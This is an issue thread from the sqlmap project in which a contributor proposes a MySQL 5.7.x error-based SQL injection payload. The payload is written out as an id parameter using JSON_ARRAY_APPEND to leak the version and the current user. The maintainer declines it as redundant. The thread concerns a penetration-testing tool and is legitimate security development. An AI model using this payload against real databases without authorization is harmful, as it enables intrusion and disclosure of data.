### ISSUE TITLE
Mysql 5.7.x Error based injection payload

### ISSUE THREAD

**Issue by hysia** [sqlmapproject/sqlmap#2046]
Mysql 5.7.x Error based injection

    ?id=JSON_ARRAY_APPEND(concat(0x414b3438,0x09,@@version,0x09,user()),1,1)

**Comment by stamparm** [comment]
`JSON_KEYS` are already used. Also, there are enough error-based MySQL payloads this moment. It would be an overkill to add another one, especially as there is already one from the `JSON` group

**Comment by hysia** [comment]
agreed!
